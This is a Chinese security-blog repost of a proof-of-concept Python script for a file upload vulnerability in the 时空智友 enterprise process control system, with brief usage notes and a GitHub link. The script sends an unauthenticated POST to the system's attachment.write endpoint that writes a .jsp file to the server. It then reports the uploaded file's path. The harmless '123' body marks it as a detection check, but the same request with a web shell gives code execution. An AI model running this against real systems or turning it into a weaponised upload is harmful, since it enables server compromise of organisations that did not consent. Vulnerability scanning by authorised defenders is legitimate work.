时空智友企业流程化管控系统文件上传漏洞检测脚本POC

admin 2024年9月28日12:27:58评论25 views字数 1383阅读4分36秒阅读模式
0x01 工具介绍

时空智友企业流程化管控系统文件上传漏洞检测脚本。
0x02 安装与使用

使用命令
skzy.py -u http://www.example.com

0x03 项目链接下载

https://github.com/wudijun/skzy

import requests
import time
import argparse
import re
import sys

def title():
    print("")
    print("")
    print('+------------------------------------------------------------+')
    print('时空智友企业流程化管控系统文件上传漏洞检测')
    print("仅限学习使用或安全排查使用,请勿用于非法测试!")
    print('使用方式:skzy.py -u http://www.example.com')
    print('+------------------------------------------------------------+')
    print("")
def poc(url):
    headers= {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
    }
    data='''123'''
    # 无视证书不报错
    requests.packages.urllib3.disable_warnings()
    try:
        req=requests.post(url+"/formservice?service=attachment.write&isattach=false&filename=test1.jsp",headers=headers,timeout=10,verify=False,data=data)
    except:
        print("请检查目标是否可访问,或不存在漏洞")
        sys.exit()
    try:
        text=req.text.encode("iso-8859-1").decode("utf-8")
        pattern = r"<root>(.*?)<\/root>"
        match = re.search(pattern, text)
        if match:
            extracted_content = match.group(1)
            print("文件上传成功路径为 /form/temp/"+extracted_content)
        else:
            print("漏洞不存在")
    except:
        print("漏洞不存在")
        sys.exit()


def arg():
    parser = argparse.ArgumentParser(description="Simple command line tool")
    parser.add_argument("-u", "--url", required=True, help="URL to target")
    args = parser.parse_args()
    url = args.url
    return url

if __name__ == '__main__':
    title()
    url=arg()
    poc(url)

原文始发于微信公众号(网络安全者):时空智友企业流程化管控系统文件上传漏洞检测脚本

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日12:27:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   时空智友企业流程化管控系统文件上传漏洞检测脚本POChttp://cn-sec.com/archives/1995934.html

发表评论

匿名网友 填写信息